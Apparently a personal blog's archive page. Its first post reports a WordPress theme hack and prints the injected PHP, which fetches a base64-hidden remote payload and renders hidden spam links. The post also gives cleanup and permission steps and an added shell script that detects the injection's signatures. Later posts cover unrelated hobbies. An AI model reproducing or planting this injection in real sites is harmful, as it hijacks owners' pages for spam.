
Archive for the 'site miscellany' Category

When Hackers And Their Little Scripts Attack WordPress Themes, Or Dr. D-Allis Talking To You About The Hidden Dangers Of Cialis (Links)

Tuesday, May 26th, 2009

In the slightly Web 2.0-modified sentiments of the master, George Carlin,

Our thrust is to prick holes in the stiff front erected by the smut hackers. We must keep mounting an offensive to penetrate any crack in their defenses, so we can lay to rest their dominate position. We want them hung and we want stiff action. Let’s get on them. Let’s ram through a stiff permission change so it’ll be hard for them to get their hacks up. WordPress’ers have got to come together so we can whip this thing into submission. It’ll be hard on us but we can’t lick it by being soft.

There are many, many, many, many, many informative pages on WordPress hacks and their potentially long and involved fixes.  The contents of this post address one specific hack that recently hit my own site, how to fix the hacked php file, and the steps to take to keep the hack from occurring again.  As usual, I provide as much of the text as I can in this post so that your google search for a particular phrase or snippet of php will land you here, as it well may have.  Speaking of google…

The presence of these hidden links on your website may cause hypertension, eye fatigue, chronic stress (if you don’t know how to remove them), and, when present for long durations, will result in a form email from google telling you that your site has been banned from google listings.  Something like the following (in crimson for emphasis):

Dear site owner or webmaster of somewhereville.com,

While we were indexing your webpages, we detected that some of your pages were using techniques that are outside our quality guidelines, which can be found here: http://www.google.com/support/webmasters/bin/answer.py?answer=35769&hl=en. This appears to be because your site has been modified by a third party. Typically, the offending party gains access to an insecure directory that has open permissions. Many times, they will upload files or modify existing ones, which then show up as spam in our index.

The following is some example hidden text we found at http://somewhereville.com/:

[INSERT QUESTIONABLE HIDDEN TEXT HERE]

In order to preserve the quality of our search engine, pages from somewhereville.com are scheduled to be removed temporarily from our search results for at least 30 days.

We would prefer to keep your pages in Google’s index. If you wish to be reconsidered, please correct or remove all pages (may not be limited to the examples provided) that are outside our quality guidelines. One potential remedy is to contact your web host technical support for assistance. For more information about security for webmasters, see http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html. When such changes have been made, please visit https://www.google.com/webmasters/tools/reconsideration?hl=en to learn more and submit your site for reconsideration.

Sincerely, Google Search Quality Team

Note: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview?hl=en and going to the Message Center.

With my luck, the contents below will somehow get me banned again, in which case I’ll just make one big screen capture and post the image in a new entry.

I had received the above email some time ago from a previous hack that I had corrected in a previous version of WordPress (somewhere in the 2.3.x range).  Within the last week or so, I received an email from friend and fellow nanotechnologist Tom Moore over at machine-phase.blogspot.com with the following picture:

The one week I lay off the egosurfing…  Needless to say, my suspicions of a hack were aroused and, er, little else.  The same form of hack as my previous 2.3.x adventure, but this is in WordPress 2.7.1 and I had properly set folder and file permissions on the server hosting this blog.  Well, almost properly set permissions…

This most recent attack occurred to a php file in my theme, a modified version of Relaxation 3 Column that is, sadly, no longer in development (hence the modifications).  The problem is not specific to this theme: the core file structure is similar across all WordPress themes, and a properly written script need only search out contents (or file names) common to all of them.

The specific modification occurred to my header.php file, which contained the following new and highly exciting content (to show the HTML, I’ve inserted a space around each bracket):

< div id="page" >
< div id="top" >< a href="/index.php" >< img title="home" src="<?php bloginfo('template_directory'); ?>/images/blank.gif" alt="home" width="1100" height="150" / >< /a >< /div >

< div id="wrapper" >< ?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8x'; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links']) > 0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k= > $v) $txt_out.=' < a href="'.$v.'" > '.$k.'< /a >'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ? >

Original to the theme:

< div id="page" >
< div id="top" >< a href="/index.php" >< img title="home" src="<?php bloginfo('template_directory'); ?>/images/blank.gif" alt="home" width="1100" height="150" / >< /a >< /div >
< div id="wrapper" >

Hacked addition:

< ?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8x'; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links']) > 0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k= > $v) $txt_out.=' < a href="'.$v.'" > '.$k.'< /a >'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ? >

And, of course, what you see for the link list depends on what the script generates at load time.  The pictures show cialis links (isn’t it nice to see a link on a blog that sends you to the manufacturer instead of some back-of-the-server distributor?), but a Firefox Page Source view loads the following viagra-centric HTML after a page reload:


< body >
< div id="page" >
< div id="top" >< a href="/index.php" >< img src="http://www.somewhereville.com/wp-content/themes/relaxation_3column/images/blank.gif" alt="home" title="home" width="1100" height="150" / >< /a >< /div >
< div id="wrapper" >
< div id='header_code' >< font style="position:absolute;overflow:hidden;height:0;width:0" >< a href="http://river.mit.edu/index.php?viagra=0" >Best Viagra Alternative< /a >< a href="http://river.mit.edu/index.php?viagra=1" > Best Viagra < /a > …2 to 806 of similar… < a href="http://river.mit.edu/index.php?viagra=807" > 50 Mg Viagra < /a >< /font >< /div >

< div id=”content” >

The problem, and this is the important part, is that the permissions on the php files for this theme were set wide open so that anyone could read, write, and execute the theme files.  After making the proper changes to the (in this case) header.php file in my ../wp-content/themes/[your theme name here] directory to remove the h4ck0r content (and, in theory, you will see the same text if you have a similar hack to your theme/header.php file), the next step is to change the permissions on these files via whatever “Attributes” window your FTP client provides (or whatever your FTP/Telnet/SSH program of choice is).  In my case, I’ve been using Robert Vasvari’s phenomenal RBrowser for OSX for quite some time.  For this program, you would click on the theme directory of choice, then right-click and select “Change Attributes.”  You’ll be brought to a screen like the following:

Now, which permissions to set depends on what sits in the directories that must be read or executed for a page or plug-in to load properly.  755 gives only the User (that should be you) write access, leaving everyone else with read and execute (and the “Apply to files inside selection” check will change everything in the folder).  For simple themes, you can very probably get away with 644, which gives everyone read access and the user read and write access.  Frankly, I don’t even know if there’s a theme-based reason for execute to be enabled (anyone willing to correct me is more than welcome to).

Make the changes (download the file, edit it in a text editor if you didn’t know this already, then FTP the corrected file(s) back up), change the permissions, and with luck and a few days’ wait, your google search will return something like the following and decidedly not like the image above:

Needless to say, if you’ve never scoured a php file and don’t know what to remove, your safest bet is just to blindly delete the theme, upload a fresh version, then change permissions.  And, if you made modifications to the php files, KEEP TRACK OF THE CHANGES.  And, of course, you should be backing up your database and website anyway in case the big one hits.
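As an added example (my own helper, not code from the post or from WordPress), a small POSIX shell script that does the check and the permission change walked through above: it scans a theme directory for php files carrying the signature of the injected wp_remote_fopen snippet, lists anything group- or world-writable, and resets directories to 755 and files to 644. The theme path and the sample header.php it builds are constructed for the demonstration.

```shell
#!/bin/sh
# Helper for the clean-up described above (added example, not the post's own
# code): find theme files carrying the injected "wp_remote_fopen procedure",
# list loose permissions, and reset them to 755 (dirs) / 644 (files).
# Usage: . ./theme_check.sh; find_injected /path/to/wp-content/themes/mytheme

# Two literal fragments that together identify the injected snippet: the
# base64-hidden remote fetch and the option it caches the payload in.
SIG_FETCH='wp_remote_fopen(base64_decode('
SIG_CACHE="update_option('cache_vars'"

# Print each .php file under $1 that contains both fragments (grep -F: literal).
find_injected() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if grep -qF "$SIG_FETCH" "$f" && grep -qF "$SIG_CACHE" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print the matching lines with line numbers so they can be removed by hand.
show_injected() {
    grep -nF "$SIG_FETCH" "$1"
}

# Print every file or directory under $1 writable by group (020) or others
# (002), i.e. the "wide open" state the post describes.
find_loose_perms() {
    find "$1" \( -perm -020 -o -perm -002 \) -print
}

# Reset to the values the post recommends: 755 on directories, 644 on files.
fix_perms() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Build a constructed sample theme (demonstration only): a header.php carrying
# the signature of the injected snippet, a clean index.php, everything 777.
make_sample_theme() {
    mkdir -p "$1/images"
    cat > "$1/header.php" <<'EOF'
<div id="wrapper"><?php /* wp_remote_fopen procedure */
$wp_remote_fopen='BASE64_URL_PLACEHOLDER';
$blarr=get_option('cache_vars');
if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.md5'))!=md5($blarr)){
  $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.txt'));
  update_option('cache_vars',$blarr); }
/* wp_remote_fopen procedure */ ?>
EOF
    printf '<?php get_header(); ?>\n' > "$1/index.php"
    chmod 777 "$1" "$1/images" "$1/header.php" "$1/index.php"
}
```

Directories need the execute bit to be traversable, so they stay 755; theme .php files are read by the PHP interpreter rather than executed, so 644 is enough for them.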

georgecarlin.com
ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked
wordpress.org/support/topic/195163
blog.taragana.com/index.php/archive/detailed-post-mortem-of-a-website-hack-through-wordpress-how-to-protect…
www.mydigitallife.info/2008/06/10/wordpress-hack-recover-and-fix-google-and-search-engine-or-no-cookie-traffic…
lorelle.wordpress.com/2009/03/07/firewalling-and-hack-proofing-your-wordpress-blog
wordpress.org
www.php.net
www.google.com
en.wikipedia.org/wiki/Hypertension
machine-phase.blogspot.com
en.wikipedia.org/wiki/Egosurfing
en.wikipedia.org/wiki/Permissions
widgets.wordpress.com/2006/06/18/relaxation-3-column
en.wikipedia.org/wiki/HTML
www.cialis.com/index.jsp
www.mozilla.com/en-US
www.viagra.com
en.wikipedia.org/wiki/File_Transfer_Protocol
www.rbrowser.com
www.apple.com/macosx

Fuse Box Description and Amperage Settings For “New” Volkswagen Beetles

Friday, April 10th, 2009

The Volkswagen New Beetle.  You can get a full-sized drum set into these things (although a 24″ kick’s going to require a padded case), a fact I learned after I bought the car in 2002, as my old Pearl Prestige Session drums had, at the time, been stolen by an antiquities-dealing crack addict who was part of a police sting operation to catch a drug lord on Syracuse’s West Side.  One of my better band stories and proof that people on drugs are not in their right state of mind.  Also handy for transporting computer clusters across state lines.

The old Nanorex cluster and my Al Foster-phase Pearl Prestige Session kit.  Click on either for a larger image.

Just so no one else has to spend as much time looking around for this information as I did to figure out a problem with my Blinker/Hazard Relay, I provide the fuse box diagram below (for google and beyond).  Click on the image for a larger view.

If you lost this card, print and shove into the glove box.  You will eventually find it handy.

www.vw.com
www.vw.com/newbeetle/en/us
www.pearldrum.com
www.syracuse.com
www.nanorex.com
en.wikipedia.org/wiki/Al_Foster

Bartles And Dame’s or Free Jazz And Cadence As Interdisciplinary Excursion

Sunday, May 27th, 2007

“Musicians are in no way responsible for anything.”
“True Art is Always Free!”
– John Bartles

Related to the usual contents of this blog only inasmuch as I pay the maintenance fees regardless, a brief historical post firmly rooted in the “There’s a fine line between ‘Once upon a time’ and ‘You’re not going to believe this” category of entries. Sunday, March 4 2007 marked the most nontraditional collaboration of my musical career (it takes me that long to get information together. People who request anything from me by email probably already know this) with the recording of “John Bartless Presents Topless and Bottomless,” a title sure to artificially increase my Technorati rank.


The kit. Click for a larger version.

Bartles sighting. Click for a larger version.

How: The Metropolis Book Shoppe in North Syracuse had an amazing run of free jazz and noise artists (Tone Collector, MoHa!, Jeff Arnal and Gordon Beeferman, Tatsuya Nakatani, just to name a few), from which I have a nice collection of autographed CDs of music none but a lucky handful will ever hear. At a few of those gigs appeared the John Bartles of which I blog. When the same 6 people comprise the majority of the audience at all the shows, you get to know everyone. Bartles never travels without a box full of some small selection of his complete works. At the time the jazz shows started, he said he was up to 64 total CDs over a 30-odd year span which, having now 25 or so in my collection with expectations of more in the mail on any random day, I unbelievably believe to be a reasonable count.

Who: John and I share a similar quirkiness (thanks Deepak) he’s had the benefit of honing far longer than I, which means the exchange of corny-to-off-color jokes ended only once we were back in our cars, much to the relief of the other participants. The extent to which Bartles’ music is nontraditional is reflected in his performance venues. This had become apparent to me upon the usual google search, where most of the relevant John Bartles links direct one to Dr. Demento playlists. That, clearly, was the virtual handshake on his offer to have me come out and record. If the iconoclastic screwball that did for The Ogden Edsl Wahalia Blues Ensemble Mondo Bizzario Band (“Dead Puppies”), Barnes & Barnes (“Fish Heads”) and Napoleon XIV (“They’re Coming To Take Me Away (Ho Ho Ha Ha He He To The Funny Farm)”) what Beavis and Butthead did for Rob Zombie thought the work of John Bartles was air-worthy, that’s enough for me. Any of the circa-1990 to 1994 Jamesville-DeWitt Band Room Lunch Club would agree on that.

Where: The session was held at Holt Studio, home of studio ace and bassist extraordinaire Gary Holt (not to be confused with the guitarist for Exodus). The drive out to Geneseo offered yet another memorable stop to see Buzzo himself (Al Bruno) at Buzzo Music, a music and instrument stockpile housed in a strip mall whose interior is reminiscent of the Bartertown branch of Amoeba Music on the west coast or the Sound Garden here in Syracuse. With Bartles as my discount card, I scored a pair of Verisonic flip-out rubber brushes, the kind your Middle School buys in bulk knowing no single pair would last the school year. Between the flashback and the feel on Remo Fiberskyns, handily worth the discounted price.

Session: Quick setup, introductions to Gary, Sean McLay (bassist) and Paul Ruske (other drummer), and we were off cutting tracks. No rehearsal, no prior knowledge of the tracks, just a requested style and a two-take maximum. If you’ve not done it before, I highly recommend NEVER jumping into a recording session laying down grooves with a second drummer you’ve never met, if for no other reason than the sanctity of the bassist’s mental state. Butch Trucks and Jaimoe we were not, but 5 or 10 more years of it and… During the free improv tunes, of course, the more arms and legs the better.

Two hours, six tracks, three jam sessions and a spate of sophomoric humor later, we’re packed and out the door back to civilization. Two weeks later, the first press arrives with 13 crafted pieces and liner notes (see photo).

A session and a story worth a mention. If any of the tunes make the Dr. Demento Show, rest assured it’ll be at the top of the CV. For those wondering just what it is I’m talking about, I provide an mp3 of “The Human Scratching Post” (the family-friendly one of the series).

www.technorati.com
www.metropolisbookshoppe.com
www.northsyracuse.org
www.tonymalaby.com
www.myspace.com/themoha
www.myspace.com/jeffarnal
www.myspace.com/gordonbeeferman
www.hhproduction.org/TATSUYA_NAKATANI_WORKS.html
mndoci.com/blog/2007/04/18/tagged-as-a-thinker/
mndoci.com
www.google.com
www.google.com/search?num=100&hl=en&safe=off&q=%22john+bartles%22&btnG=Search
www.drdemento.com
www.google.com/search?num=100&hl=en&safe=off&q=%22john+bartles%22+demento&btnG=Search
en.wikipedia.org/wiki/Ogden_Edsl
en.wikipedia.org/wiki/Barnes_&_Barnes
en.wikipedia.org/wiki/Napoleon_XIV
en.wikipedia.org/wiki/Beavis_and_butthead
www.robzombie.com
www.jamesvilledewitt.org
www.holtstudio.biz
www.exodusattack.com
www.geneseony.com
www.democratandchronicle.com/homes/community/geneseo/story12.html
maps.google.com/maps?f=l&=&q=buzzo+music&near=Geneseo%2C+NY&btnG=Search+Businesses
en.wikipedia.org/wiki/Mad_Max_Beyond_Thunderdome
www.amoeba.com
www.cdjoint.com
www.syracuse.com
www.verisonicsticks.com
www.verisonicsticks.com/brushes/index.html#vs60
www.remo.com
www.remo.com/portal/products/3/8/52/ds_fiberskyn_3.html
www.garageband.com/artist/chinchillas
www.drummerworld.com/drummers/Butch_Trucks_Jaimoe.html
www.somewhereville.com/?page_id=52

Zoro, Joy Williams, Ben Glover, And The Brothers Feng

Sunday, May 27th, 2007

With a random reunion at the Marshall St. Starbucks, I’ve found myself the guest of fellow JD Class of ’94 alum and olde buddy Mike Feng at two concerts as part of CNY Crossroads. There’s a certain logic to expecting professionalism and excellent performances from the Christian folk/rock community, as lip-sync’ing is, somehow, a smote-worthy offense. I’m reminded of an Amy Grant performance at some Billboard Music Awards show way back when during her “Heart in Motion” phase and watching the drummer ACT like he was hitting his left crash cymbal while clearly MISSING the target despite audio to the contrary. Let’s face it. If the drummer’s fakin’, the band’s plugged into ground and that’s about it.

And I’ve got two words for Ashlee Simpson. Skid Row.


Click for a larger version.

Click for the video.

I went to the most recent show (April 28, 2007) specifically to see Zoro, easily one of the funkiest groove drummers around (I refer you to the list of accolades on his own site. Baby, it’s bad). While backstage, I also met Joy Williams and Ben Glover, the “other” performers for the evening of which I’d known nothing prior. Completely laid back and casual, genuinely happy to be in Syracuse performing from Nashville. After Zoro’s first (of two short) drumset spots, Joy and Ben came out and completely leveled the place (that’s music jargon if you’re not a member of the discourse community). Ben is the consummate guitar accompanist and background vocalist, and we killed a good hour after the show engrossed in nanotech (when people ask what else I do besides drumming, well, you can imagine where the conversation goes). As for Joy, words do little justice to the quality of the singing voice she carries around (that’s my musical AND professional opinion, BTW). I took the opportunity of a false start to record one of the two cover tunes of the night (In Your Eyes, by Peter Gabriel), the video for which I provide above.

en.wikipedia.org/wiki/Marshall_Street
www.starbucks.com
ww.jamesvilledewitt.org
www.pecinc.com/pecsite
www.cnycrossroads.com
www.amygrant.com
www.billboard.com/bbcom/index.jsp
www.youtube.com/watch?v=MziHkbJRMdU
www.youtube.com/watch?v=W5zu2mUEe8Q
www.zorothedrummer.com
www.zorothedrummer.com/about.htm
www.joywilliams.net/index.html
www.christianitytoday.com/music/artists/benglover.html
www.syracuse.com
www.nashville.net
www.petergabriel.com

“We have no idea what’s going on up there.”

Tuesday, February 13th, 2007
Oswego

It’s a fun story, certainly a prime example of my occasional lack of common sense, and more first-hand eyewitness reporting of the state of Oswego county and points nearby. So, because I’m here to blog it, I provide below my attempted travel to Clarkson for a department colloquium and nanoworkshop.

6:00 am – begin drive to Potsdam. Cold wind, blue skies.

6:20 am – approaching Mexico, NY. Few flakes, but nothing to stop a (er, my) VW Beetle.

6:25 am – within five minutes, blue skies had turned into white skies. The abruptness of the change from non-lake effect to lake effect should have been warning enough.

7:00 am – somewhere between 6:25 and 7:00 am, when it hadn’t been snowing THAT BAD yet, I decided it was time to do something stupid, so I pulled out the digital Elph, set it to movie mode, and recorded the little snippet above.

7:25 am – the turning point. After 1 hr, the 4-car caravan I found myself (thankfully) at the back of had made it nearly 5 miles towards the Mexico exit (34 on 81 N). By this time, the red glow of the taillights two cars in front of me were intermittently viewable due to snow obstruction. The exit itself was marked with a tractor trailer pulled to the side of the road, lights flashing. The three cars ahead of me begin the slow rightward veer to the exit. I trudge ahead beyond the exit…

7:26 am – … 13 feet. I wish now that I had had the better mind to take a picture of the view in front of me. My wagon train had been the ONLY thing on the road in at least… 20 minutes. In that 20 minutes, any pair of tire tracks were filled in, leaving nothing to follow. For all intents and purposes, 81 North WAS GONE. Literally disappeared. It looked like I had taken a hard right turn off the road and was facing the woods, the woods as they would have appeared after any other snow storm. The snow was at 7 inches where the tracks would have been, making the actual level of the snow all of 13 inches, making the path in front of me at least 3 inches higher than the clearance of the Beetle.

7:27 am – for the first time in my otherwise spotless driving career, I threw the car into reverse (which has to be some kind of no-no on a state highway) and drove back towards exit 34. Just barely making it to Route 104, I wait with the accumulated cars in the accumulation.

7:45 am – some small group of drivers begin the trip along 104 West, theoretically back onto 81 S. The on-ramp, invisible and sign-less, is overshot by all involved, leaving us to slip+slide along 104 W towards… nowhere in particular. With nowhere to turn around due to the height of the snow drifts, we trudge along for several miles. I knew there were houses there, as I could see the orange glow of room lights cutting through thinned snow drifts building up at house walls.

8:05 am – some spot in the road was wide enough to turn around, which we all did.

8:25 am – We reached the 81 South on-ramp just in time for the National Weather Service to declare a state of emergency in Oswego. “Far out,” I said. I hadn’t gotten near Oswego yet.

After 9:30 am – now comfortably out of the worst of the weather, I make the first calls to Cetin Cetinkaya at Clarkson and let him know I’m going to be late. About a week and a half late.

3 hr 3 min or so to get all of 35 miles. I’ve mentioned this to every Syracusan I’ve told the story to. No matter what you’ve seen on the TV, heard on the radio, or read about in the paper, we have no idea what’s going on up there.

www.usa.canon.com/consumer/controller?act=ModelDetailAct&fcategoryid=145&modelid=12466
www.google.com/maps?q=Mexico,+NY&sa=X&oi=map&ct=title
www.clarkson.edu/mae/faculty/cetinkaya.html
en.wikipedia.org/wiki/Lake_effect_snow
www.vw.com/newbeetle
www.co.oswego.ny.us
www.potsdam.ny.us
www.nws.noaa.gov
www.oswegony.org
www.clarkson.edu
